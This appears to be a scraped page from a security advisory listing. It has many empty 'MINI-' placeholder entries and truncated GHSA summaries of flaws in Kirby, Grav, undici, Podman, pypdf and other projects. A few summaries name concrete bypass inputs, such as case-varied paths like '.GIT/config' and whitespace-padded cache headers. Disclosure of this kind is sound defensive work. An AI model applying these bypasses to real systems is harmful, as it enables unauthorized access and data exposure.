883126 matches found
MINI-MMVX-RM89-M3J8
Bulletin has no description...
MINI-623G-8R98-695G
Bulletin has no description...
MINI-PGFQ-66R7-M866
Bulletin has no description...
GHSA-X5MV-8WGW-29HG tract-nnef: integer overflow in NNEF `.dat` tensor parser yields an out-of-bounds read on model load
Component: tract-nnef nnef/src/tensors.rs::readtensor + tract-data data/src/tensor.rs - Affected versions: 0.21.16, 0.22.0–0.22.2, 0.23.0–0.23.1 — the dense DatLoader path was unguarded across all three release lines; patched in 0.21.16 / 0.22.2 / 0.23.1 - Class: CWE-190 integer overflow →...
MINI-2R3G-QFJ3-33RJ
Bulletin has no description...
GHSA-W5CV-PW74-4RXC opentelemetry-collector-contrib: githubreceiver silently ignores configured required_headers authentication
githubreceiver Silently Ignores Configured requiredheaders Authentication Summary The githubreceiver webhook handler does not enforce the requiredheaders configuration. Headers are validated at startup config rejects empty keys/values but never checked on incoming requests. This follows the same...
GHSA-R3W8-2C5R-H9J9 Kirby: `pages.access` permission is not checked in the `site/find` REST API route
TL;DR This vulnerability affects all Kirby sites where users of a particular role have no permission to access pages pages.access permission is disabled. This can be due to configuration in the user blueprints, options in the model blueprints, or a combination of both settings. It was possible to...
GHSA-WHXW-24JC-CWMV Kirby: External Initialization of the Panel on reverse proxy setups with the `Forwarded` header
TL;DR This vulnerability affects Kirby sites that have no configured user accounts and are running on publicly accessible servers behind a reverse proxy that sets the Forwarded: for=..., X-Client-IP, or X-Real-IP request header. It was possible to install the Panel = create the first admin user i...
GHSA-WR9H-4R83-F4V6 Kirby: Cross-site scripting (XSS) from incomplete HTML/XML sanitization in `Dom::sanitize()`
TL;DR This vulnerability affects Kirby sites and plugins that use the writer or list fields or that use $dom-sanitize, Sane::sanitize, Sane\Html::sanitize, Sane\Svg::sanitize, Sane\Xml::sanitize, Sane::sanitizeFile or $file-sanitizeContents with untrusted input. It was possible to inject maliciou...
GHSA-RHJ6-R49H-5932 Kirby: Self cross-site scripting (self-XSS) in the writer field
TL;DR This vulnerability affects Kirby sites that use the writer field in any blueprint. It was possible to include a scripting link as the target of a link or email link. This link target would then be clickable by the user who entered it. A successful attack commonly requires knowledge of the...
GHSA-RVP7-W75Q-9FV2 BBOT: Symlink-Following Arbitrary Write via github_workflows Module
The githubworkflows module constructs local directory paths from user-controlled repository names without validating for symlinks. A local attacker sharing the scan directory can plant a symlink at the predictable output path, causing workflow data to be written to an attacker-chosen location...
MINI-69G5-G8W4-VW9M
Bulletin has no description...
MINI-CQ89-J96F-99Q3
Bulletin has no description...
MINI-9CV2-94WW-QVF6
Bulletin has no description...
MINI-WCFX-JFHQ-W236
Bulletin has no description...
MINI-W3CW-8527-2RGH
Bulletin has no description...
MINI-V339-CQJR-RXC8
Bulletin has no description...
MINI-59PF-6WXG-J9PX
Bulletin has no description...
MINI-4V7G-CV4P-4F4G
Bulletin has no description...
MINI-WC45-XJ5V-VM8X
Bulletin has no description...
MINI-97H9-956F-MMC3
Bulletin has no description...
GHSA-C226-Q6FX-6J6C OpenClaw: macOS Swift exec allowlist missed combined POSIX inline flags
Summary macOS Swift exec allowlist missed combined POSIX inline flags. In affected versions, a command request using combined POSIX inline-command flags could miss inline-command content expressed through combined flags. This advisory is scoped to the named feature and configuration. It does not...
MINI-JMQR-34GQ-9FF8
Bulletin has no description...
MINI-765F-76FQ-G8C4
Bulletin has no description...
MINI-C43J-XCX3-G4C5
Bulletin has no description...
GHSA-PMF8-G7C8-7V54 Grav: Stored CSS injection via Markdown image ?style=… reaches MediaObjectTrait::style() — incomplete patch of GHSA-r7fx-8g49-7hhr
Summary The fix for GHSA-r7fx-8g49-7hhr / CVE-2026-42841 Stored XSS via Markdown media attribute action is incomplete. The maintainer patched MediaObjectTrait::attribute to deny dangerous attribute names event handlers, style, xmlns, srcdoc, formaction but the sibling MediaObjectTrait::style meth...
GHSA-2FJJ-QQG8-FG7X praisonai-platform: Authorization Bypass Through User-Controlled Key
Summary The issue create and update endpoints in praisonai-platform accept a projectid in the request body and persist it without validating that the project belongs to the URL workspace. A user who is a member of workspace WB and has no access to workspace WA can create issues that reference a...
MINI-XF6J-CW8V-HG9X
Bulletin has no description...
MINI-45G9-XV4J-7F78
Bulletin has no description...
MINI-PF65-5PFJ-MFM9
Bulletin has no description...
MINI-325F-3884-W8F2
Bulletin has no description...
MINI-7VCR-39X6-GPVQ
Bulletin has no description...
MINI-M8VV-5GFG-C5X8
Bulletin has no description...
MINI-G7R3-339Q-Q378
Bulletin has no description...
MINI-W433-583W-F4X2
Bulletin has no description...
MINI-2H5X-QJVM-9PHX
Bulletin has no description...
MINI-2H3C-X55H-JMC9
Bulletin has no description...
MINI-8R5P-QQ6W-8JG4
Bulletin has no description...
MINI-XMXR-2FR9-CF22
Bulletin has no description...
MINI-QQ8X-RJ5F-X78Q
Bulletin has no description...
MINI-VF8F-38V7-M438
Bulletin has no description...
MINI-RV8W-Q85G-87PJ
Bulletin has no description...
MINI-H35H-FF46-MX39
Bulletin has no description...
MINI-7V73-V68X-GFJM
Bulletin has no description...
GHSA-2F86-9CP8-6HCF Grav: Admin Backup Zip File Exposes Account Credentials and Configuration Secrets
Summary An authenticated administrator with backup permissions can download a ZIP archive containing the full Grav installation root, including user/accounts/admin.yaml with the admin's bcrypt password hash and email, plus user/config/ with all site configuration. The download endpoint requires...
GHSA-J99Q-93C9-H869 MCPVault: PathFilter restricted-directory deny-list bypass via case and trailing dot/space equivalence
On case-insensitive filesystems macOS, Windows, PathFilter compiled its deny-list patterns case-sensitively and matched the path verbatim, so names like .Git/config, .GIT/config, or .oBsIdIaN/secrets.md slipped past the .git/.obsidian/nodemodules restriction while the OS opened the real file. On...
GHSA-JM82-FX9C-MX94 pypdf: Missing stream length values ignore defined limits
Impact An attacker who uses this vulnerability can craft a PDF which leads to large memory usage, as MAXDECLAREDSTREAMLENGTH is sometimes ignored. This requires parsing a content stream without a /Length value. Patches This has been fixed in pypdf==6.13.3. Workarounds If you cannot upgrade yet,...
GHSA-Q6R4-3WMG-FWCQ Podman: WORKDIR symlink traversal vulnerability
Summary Running a malicous container image where the WORKDIR path contains a symlink can create a directory or modify ownership on the host filesystem. Modified ownership is less likely to happen as that requires help from an untrusted/malicious process that mutates the host filesystem tree durin...
GHSA-VMH5-MC38-953G undici vulnerable to TLS certificate validation bypass via dropped requestTls in SOCKS5 ProxyAgent
Impact undici's ProxyAgent silently drops the requestTls option when configured with a SOCKS5 proxy URI socks5:// or socks://. The target HTTPS connection through the SOCKS5 tunnel falls back to Node's default trust store, ignoring user-configured ca, cert, key, rejectUnauthorized, and servername...
GHSA-PR7R-676H-XCF6 undici vulnerable to cross-user information disclosure via shared cache whitespace bypass
Impact Undici's cache interceptor incorrectly classifies some responses as cacheable when the upstream Cache-Control header uses whitespace-padded qualified private or no-cache field names such as private=" authorization" or no-cache="\tauthorization". The parser preserves the surrounding...